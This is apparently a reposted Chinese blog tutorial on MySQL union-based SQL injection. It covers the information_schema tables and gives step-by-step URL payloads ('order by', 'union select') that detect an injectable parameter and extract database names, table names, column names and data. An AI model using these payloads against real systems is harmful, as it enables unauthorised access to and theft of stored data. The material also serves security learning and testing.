sql注入--mysql

标签：base   com   系统   inf   on()   order   5.0   判断   操作系统   

mysql数据库结构:

　　数据库A  --> 表名  --> 列名 --> 数据

　　数据库B  --> 表名  --> 列名 --> 数据

mysql数据库信息:

　　mysql 5.0以上自带数据库：information_schema

　　information_schema.schemata: 数据库下的schemata库名，含义：存储所有数据库下的库名信息的表。

　　information_schema.tables: 数据库下的tables表名，含义：存储所有数据库下的表名信息的表。

　　information_schema.columns: 数据库下的columns表名，含义：存储所有数据库下的列名信息的表。

　　database()：数据库名

　　user()：数据库用户

　　version()：数据库版本

　　@@version_compile_os：操作系统　

　　table_schema：数据库名

　　table_name：表名

　　column_name：列名

mysql注入过程:

　　(1) 判断注入点:  ?id=1 and 1=1 ;? id=1 and 1=2

　　(2) 判断长度: ?id=1 order by 3

　　(3) 获取基本信息: @@version_compile_os , version()  , database()  , user()

　　(4) 获取库名: ?id=1 union select table_schema,2,3 from information_schema.schemata

　　(5) 获取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 库名[16进制]

　　(6) 获取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 库名[16进制]

　　　　　　　　　and table_name = 表名[16进制]

　　(7) 获取数据: ?id=1 union select 列名[16进制],列名[16进制],3 from 表名[16进制]

sql注入--mysql

标签：base   com   系统   inf   on()   order   5.0   判断   操作系统   

原文地址：https://www.cnblogs.com/China-Waukee/p/9606656.html